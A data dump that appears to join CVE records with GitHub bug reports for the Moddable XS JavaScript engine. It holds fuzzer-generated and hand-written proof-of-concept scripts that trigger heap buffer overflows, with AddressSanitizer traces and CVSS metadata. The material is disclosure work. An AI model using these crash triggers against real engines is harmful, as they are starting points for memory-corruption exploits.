Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } b2[92] = 108; var i = 0; b2[93] = 97; f(); b2[94] = 116; var i = 0; var str = ' /x/g '; var handler = { get: function (target, name) { if (name == 'length') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var c = FMRc.call(m, 'AAAA'); var str = ' /x/g '; b2[95] = 101; var oobString = fun.toString(); var Wtwd = new Map([ [ 1073741823, -0.7980880066582703, 0.3398226154365076, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); var oob = 'value'; b2[402] = 0; b2[97] = 2; b2[98] = 10; var o = a.map.call(p, test); var fun = eval(str); var obj = {}; b2[99] = 0.6964130764836092; b2[0.8946850256758991] = 2; var i = 0; function log() { var str = ''; for (var i = 0; KTta; i++) { str += arguments[i]; } str += 'arguments'; JSON.stringify(str); } var p = new Proxy([], handler); var ar = new Int8Array(c[0]); function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var bQDT = b2[216]; b2[101] = 6; var str = ' /x/g '; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('re', 'undefined'.repeat(1048576)); var str = 'v0' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } function getHiddenValue() { var obj = {}; function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var oobString = makeOobString(); var p = new Proxy([], handler); var m = JSON.stringify(new Uint8Array(f(v => parseInt(v, 16)))); var str = 'configurable'; var oob = ''; var d = new Array(1, 2, 3); oob = 'ざ'.repeat('re', eval(1048576)); var str = str; var str = '({valueOf:function(){return \'0\';}})'; var fun = eval(str); eval(obj, fun); return obj; } b2[102] = 0; b2[103] = 65; var i = 0; b2[0.01645313561602557] = 42; b2[105] = 16; var handler = { get: function (target, name) { if (name == '({})') { return 256; } function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('{}', '1'.repeat(1048576)); var str = '\'/0/\'' + oob + '0.1'; var fun = eval(str); Object.assign(obj, fun); return obj; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; b2[750] = 0; b2[107] = 11; b2[108] = 347; b2[109] = 1; var obj = {}; function log() { var str = '<h3>'; for (var i = 0; KTta; i++) { var d = new Array(1, 2, 3); str += arguments[i]; } str += '</h3>'; var oob = 'eval'; log(/[\s\r\n]+/g).call(str); } var obj = {}; b2[110] = 255; function makeOobString() { var hiddenValue = getHiddenValue(); function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('re', ' /x/ '.repeat(0.573204658263275)); var str = 'constructor' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } var str = '({x:3})'; var fun = eval(str); function log() { var str = '(new Boolean(false))'; var handler = { get: function (target, name) { if (name == 'value') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; function test() { return 131354989131639; } var oob = 'eval'; for (var i = 0; ijjkkk < 100000; i++) { str += arguments[i]; } str += '</h3>'; foo(str); } var handler = { get: function (target, name) { if (name == 'function(){}') { return 256; var oobString = fun.toString(); } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var array = []; foo(fun, hiddenValue); var obj = {}; var foo = function (stdlib, foreign, heap) { 'false'; var d = new Array(1, 2, 3); var MEM = new stdlib.Uint8Array(heap); function log() { var str = 'prototype'; for (var i = 0; GXka; i++) { str += arguments[i]; } str += '</h3>'; var str = 'ざ' + oob + '}'; var d = new Array(1, 2, 3); var oobString = fun.toString(); '*'.repeat(str); var fun = eval(str); } function foo(x) { var Wtwd = new Map([ [ 0.679732693083732, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); MEM[MEM[b2[12]]] *= 0; } return { foo: foo }; }(this, {}, new ArrayBuffer(1)).foo; var oobString = parseInt(); return oobString; } b2[111] = 255; var obj = {}; var m = '*'.repeat(new Uint8Array(f(v => parseInt(v, 16)))); b2[112] = 255; function makeOobString() { var oob = 'eval'; var hiddenValue = getHiddenValue(); var str = ''; var fun = eval(str); var m = '-0'.repeat(new Uint8Array(print(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); Zxac.call(fun, hiddenValue); var r = new RegExp(RegExp('\'/0/\'')); var p = new Proxy([], handler); var oobString = makeOobString(); var hiddenValue = getHiddenValue(); var ar = new Int8Array(c[0]); var oobString = Object.assign(/[\s\r\n]+/g).map(); return oobString; } function log() { var str = '/0/'; var p = new Proxy([], handler); for (var i = 0; KTta; i++) { str += arguments[i]; } var a = new Array(1, 2, 3); str += ''; function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('re', 'eval'.repeat(1048576)); var str = '{}' + oob + '(new String(\'\'))'; var fun = eval(str); Object.assign(obj, fun); return obj; } f(str); } var MEM = new stdlib.Uint8Array(heap); var oobString = fun.toString(); function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' \'use strict\' '; var str = ''; function makeOobString() { var hiddenValue = getHiddenValue(); var str = '(new Boolean(false))'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var fun = eval(str); var array = []; var oobString = fun.toString(); var str = ' /x/g '; var r = new RegExp(RegExp('')); function log() { var str = 'true'; var hiddenValue = getHiddenValue(); for (var i = 0; GXka; i++) { str += arguments[i]; } var i = 0; str += '</h3>'; f(str); } Zxac.call(fun, hiddenValue); var handler = { get: function (target, name) { if (name == '\'0\'') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { var oobString = makeOobString(); return true; } }; var oobString = makeOobString(); var foo = function (stdlib, foreign, heap) { function test() { return 131354989131639; } '6'; var a = new Array(1, 2, 3); var MEM = new stdlib.Uint8Array(heap); var oobString = fun.toString(); function foo(x) { MEM[MEM[b2[0.21503255514884878]]] *= 0; } return { foo: foo }; }(this, {}, new ArrayBuffer(1)).foo; var oobString = Object(); return oobString; } b2[113] = 255; function log() { var o = a.map.call(p, test); var str = '(new String(\'\'))'; for (var i = 0; KTta; i++) { str += arguments[i]; function test() { return 131354989131639; } } str += ' \'A\' '; var fun = eval(str); xhCc.call(str); } b2[114] = 31; b2[689] = 127; var obj = {}; b2[116] = 32; parseInt(null); var r = new RegExp(RegExp('(new Number(0))')); var str = '{}' + oob + 'Infinity'; b2[117] = 0; function log() { var str = '<h3>'; for (var i = 0; GXka; i++) { str += arguments[i]; } var oobString = makeOobString(); str += '</h3>'; var d = new Array(1, 2, 3); Object(str); var fun = eval(str); } var MEM = new stdlib.Uint8Array(heap); var fun = eval(str); var fun = eval(str); var i = 0; b2[118] = 32; var p = new Proxy([], handler); b2[119] = 1; var oob = '1024'; b2[120] = 65; var fun = eval(str); b2[0.39265877342697486] = 4; b2[122] = 108; function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var a = new Array(1, 2, 3); function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('re', '(new Boolean(false))'.repeat(165)); var str = '{}' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } var ar = new Int8Array(c[0]); var oob = 'arguments.callee'; var handler = { get: function (target, name) { if (name == 'length') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } b2[123] = 106; b2[124] = 33; var oobString = fun.toString(); b2[125] = 2; b2[126] = 2; var oobString = makeOobString(); b2[127] = 64; function makeOobString() { var r = new RegExp(RegExp('this')); var hiddenValue = getHiddenValue(); var str = '(new Number(-0))'; var fun = eval(str); var i = 0; print(fun, hiddenValue); var oobString = 'wrappedJSObject'.repeat(); var str = '' + oob + '}'; return oobString; } var obj = {}; var ar = new Int8Array(c[0]); b2[128] = 3; var Tizh = b2[0.7439351210724463]; b2[129] = 64; b2[0.8544370950808029] = 32; var MEM = new stdlib.Uint8Array(heap); b2[131] = 489; b2[132] = 32; var oobString = fun.toString(); var o = a.map.call(p, test); var a = new Array(1, 2, 3); var m = parseInt(new Uint8Array('configurable'.split(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); var o = a.map.call(p, test); f(); b2[133] = 0.09303413024051976; var m = oob.replace(/[\s\r\n]+/g).map(new Uint8Array(Object(v => parseInt(v, 16)))); b2[134] = 518; var r = new RegExp(RegExp('(new Number(0))')); var m = '__proto__'.repeat(new Uint8Array('00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); b2[809] = 13; b2[136] = 1; var oobString = makeOobString(); var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 0.3960554209954754, 3037000498 ] ]); var m = DJkJ.call(new Uint8Array(''.repeat(/[\s\r\n]+/g).map(v => parseInt(v, 16)))); b2[890] = 65; var fun = eval(str); var obj = {}; b2[138] = 42; b2[139] = 16; b2[140] = 0; function makeOobString() { var hiddenValue = getHiddenValue(); var str = ' /x/g '; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var KTta = ijjkkk < 100000; b2[141] = 32; b2[142] = 3; var ar = new Int8Array(c[0]); var fun = eval(str); b2[0.5916016519869236] = 65; var o = a.map.call(p, test); b2[144] = 196; var obj = {}; var str = '<h3>'; var d = new Array(1, 2, 3); var oobString = Object(); function log() { function test() { return 974; } var str = 'constructor'; for (var i = 0; KTta; i++) { var fun = eval(str); str += arguments[i]; } var r = new RegExp(RegExp('(new Number(0))')); str += ' "" '; var fun = eval(str); log(str); } var DbXR = b2[169]; var oob = '1.23'; var oobString = makeOobString(); var oobString = makeOobString(); function getHiddenValue() { var obj = {}; var oob = 'function(){}'; oob = oob.replace('', 'ざ'.repeat(1048576)); var str = '{}' + oob + '}'; var fun = eval(str); Object.assign(obj, fun); return obj; } b2[145] = 0; var str = ' /x/g ' + oob + 'new String(\'\')'; b2[0.31981663195431476] = 32; b2[147] = 0; var str = 'configurable'; b2[0.10015913892675243] = 0.4531112950164282; var i = 0; var str = ' \'use strict\' '; var xhCc = Object(1073741823); function test() { return 131354989131639; } b2[149] = 2; var str = '<h3>'; var oobString = makeOobString(); function foo(x) { var i = 0; MEM[array.length] *= 0.03463922022521104; function test() { return 131354989131639; } var ar = new Int8Array(c[0]); } var str = '{}' + oob + ''; var fun = eval(str); var oobString = getHiddenValue(); b2[0.0448064917304849] = 0; var obj = {}; b2[151] = 990; var oob = '[1]'; b2[152] = 0.6499810409448248; b2[153] = 0; b2[154] = 106; function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'new String(\'q\')'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var str = str; function getHiddenValue() { var obj = {}; var oob = 'caller'; oob = parseInt('[0]', foo(/[\s\r\n]+/g).map(1048576)); var m = foo(new Uint8Array(getHiddenValue(v => parseInt(v, 16)))); var oobString = fun.toString(); var str = '({valueOf:function(){return \'0\';}})'; var a = new Array(1, 2, 938); var c = ''.repeat(m, 'AAAA'); function foo(x) { MEM[array.length] *= 0; } function log() { var str = ''; var oob = 'eval'; for (var i = 0; KTta; i++) { str += arguments[i]; var oobString = fun.toString(); } str += '({valueOf:function(){return 0;}})'; fun.toString(str); } var fun = eval(str); function getHiddenValue() { var obj = {}; var oob = 'createIsHTMLDDA()'; oob = oob.replace('re', 'constructor'.repeat(166)); var str = '{}' + oob + '(new String(\'\'))'; var fun = eval(str); Object.assign(obj, fun); return obj; } Zxac.call(obj, fun); var str = '[1]' + oob + '}'; return obj; } b2[155] = 33; b2[534] = 0.8303399345773845; var i = 0; var shGT = Promise; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 42, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 3.141592653589793, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); var MEM = new stdlib.Uint8Array(heap); var r = new RegExp(RegExp('(new Number(0))')); b2[523] = 32; var oobString = makeOobString(); var oob = 'null'; var o = a.map.call(p, test); b2[158] = 0; b2[159] = 65; var hiddenValue = getHiddenValue(); b2[160] = 4; b2[161] = 106; function getHiddenValue() { var obj = {}; var oob = 'new String(\'q\')'; oob = oob.replace('({x:3})', '+0'.repeat(1048576)); var str = '{}' + oob + '(new Boolean(true))'; var fun = eval(str); Object.assign(obj, fun); return obj; } var str = '1024'; var Wtwd = new Map([ [ 1073741823, -9007199254740994, 914, 0.2, -9007199254740992 ], [ -4294967296, -1.7976931348623157e+308, 1073741822, 939, 9007199254740994, 1200, 1e+400, 3037000498 ] ]); b2[162] = 33; var fun = eval(str); var i = 0; var HGzH = f(); b2[163] = 0; var str = '+0'; function getHiddenValue() { var obj = {}; var oob = '[1]'; function log() { var str = '<h3>'; var fun = eval(str); for (var i = 0; KTta; i++) { var obj = {}; str += arguments[i]; } var fun = eval(str); str += '</h3>'; print(str); } oob = getHiddenValue('re', getHiddenValue(1048576)); var ar = new Int8Array(c[0]); var str = ' \'use strict\' ' + oob; function foo(x) { MEM[array.length] *= 0; var r = new RegExp(RegExp('(new Number(0))')); } var fun = eval(str); JSON.parse(obj, fun); return obj; } b2[164] = 399; b2[165] = 742; var obj = {}; var p = new Proxy([], handler); var hiddenValue = getHiddenValue(); b2[166] = 11; function foo(x) { MEM[MEM[b2[151]]] *= 0; } b2[167] = 11; b2[168] = 32; var hiddenValue = getHiddenValue(); var p = new Proxy([], handler); var oobString = '*'.repeat(); b2[169] = 3; b2[170] = 11; var oob = 'function(){}'; function f() { function log() { var str = '<h3>'; for (var i = 0; KTta; i++) { str += arguments[i]; var oobString = fun.toString(); } str += '</h3>'; ''.repeat(/[\s\r\n]+/g).map(str); } print('(new Boolean(true))'); } var oobString = Object(); var c = '(new Boolean(false))'.repeat(m, 'AAAA'); function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'writable'; var fun = eval(str); Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var memory = new WebAssembly.Memory({ initial: 1, maximum: 1 }); function getHiddenValue() { var i = 0; var obj = {}; var str = '{}' + oob + '}'; var oob = '[1]'; var o = a.map.call(p, test); oob = '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split('[\'z\']', 'arguments.callee'.repeat(/[\s\r\n]+/g).map(1048576)); var str = 'undefined'; var c = foo(m, 'AAAA'); function foo(x) { MEM[array.length] *= 0; var hiddenValue = getHiddenValue(); var o = a.map.call(p, test); } var handler = { get: function (target, name) { if (name == 'length') { return 256; } var i = 0; return { [Symbol.species]: dummy }; }, has: function (target, name) { return true; } }; var fun = eval(str); var a = new Array(1, 2, 3); var ar = new Int8Array(c[0.31387494748168865]); foo(obj, fun); var oob = 'eval'; var p = new Proxy([], handler); function log() { var str = '<h3>'; for (var i = 0; GXka; i++) { var d = new Array(1, 2, 3); str += arguments[i]; } str += '</h3>'; print(/[\s\r\n]+/g).map(str); } var o = a.map.call(p, test); return obj; } var obj = {}; f(); var oob = '/re/'; var fun = eval(str); var hiddenValue = getHiddenValue(); var mod = new ('00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(/[\s\r\n]+/g)).map(b2); var i = new WebAssembly.Instance(mod, { imports: { imported_func: f }, js: { mem: memory } }); function getHiddenValue() { var obj = {}; var oob = 'eval'; oob = oob.replace('', 'eval'.repeat(836)); var str = '{}' + oob + '(new Boolean(true))'; var fun = eval(str); Object.assign(obj, fun); return obj; } var ar = new Int8Array(c[0]); var FMRc = b2[102]; var str = DJkJ.call(/[\s\r\n]+/g).map(/[\s\r\n]+/g); Zxac.call(0, 19); ``` # description ``` ================================================================= ==5952==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f730 at pc 0x7fb0e59e7709 bp 0x7ffdf461acb0 sp 0x7ffdf461a458 WRITE of size 3349 at 0x61b00001f730 thread T0 #0 0x7fb0e59e7708 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x62708) #1 0x62b200 in fxIDToString /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSymbol.c:510 #2 0x5d5fa9 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2135 #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708 #4 0x5fe6a4 in fxRunEval /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4279 #5 0x5f96a0 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:3970 #6 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708 #7 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369 #8 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270 #9 0x7fb0e50b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8) 0x61b00001f730 is located 0 bytes to the right of 1456-byte region [0x61b00001f180,0x61b00001f730) allocated by thread T0 here: #0 0x7fb0e5a1d79a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a) #1 0x42079e in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1271 #2 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249 #3 0x7fb0e50b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffbee0: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa 0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==5952==ABORTING ```
heap-buffer-overflow(fxIDToString)
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/583/comments
0
2021-02-26T10:30:40Z
2021-03-23T22:52:57Z
https://github.com/Moddable-OpenSource/moddable/issues/583
817,236,754
583
2,796
CVE-2021-29327
2021-11-19T17:15:08.203
OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_ArrayBuffer function at /moddable/xs/sources/xsDataView.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/580" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/580" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Moddable-OpenSource/moddable/issues/580
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` function gc() { for (let i = 0; i < 500; i++) { let ab = new ArrayBuffer(1518500249 | 1073741823); } } function opt(obj) { for (let i = 0; yjwa; i++) { } let tmp = { a: 1 }; gc(); tmp.__proto__ = {}; var hedB = escape(null); for (let k in tmp) { tmp.__proto__ = {}; gc(); obj.__proto__ = {}; var yjwa = i < 500; return obj[k]; } } opt({}); var CPzS = fake_object_memory[0]; let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 4660; let fake_object = opt(fake_object_memory); opt(9007199254740990); print(fake_object); ``` # description ``` ================================================================= ==5914==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f603a9fe820 at pc 0x7f603de4ebec bp 0x7ffc75e18740 sp 0x7ffc75e17ee8 WRITE of size 2147483647 at 0x7f603a9fe820 thread T0 #0 0x7f603de4ebeb in __asan_memset (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8cbeb) #1 0x49c99e in fx_ArrayBuffer /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDataView.c:431 #2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824 #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708 #4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369 #5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270 #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8) 0x7f603a9fe820 is located 0 bytes to the right of 16777248-byte region [0x7f60399fe800,0x7f603a9fe820) allocated by thread T0 here: #0 0x7f603de5a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122 #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377 #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159 #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305 #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249 #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memset Shadow bytes around the buggy address: 0x0fec87537cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fec87537cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fec87537cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fec87537ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fec87537cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fec87537d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0fec87537d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fec87537d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fec87537d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fec87537d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fec87537d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==5914==ABORTING ```
heap-buffer-overflow(fx_ArrayBuffer)
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/580/comments
0
2021-02-26T10:30:01Z
2021-03-23T22:52:56Z
https://github.com/Moddable-OpenSource/moddable/issues/580
817,236,265
580
2,797
CVE-2021-29328
2021-11-19T17:15:08.247
OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/585" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/585" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/Moddable-OpenSource/moddable/issues/585
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
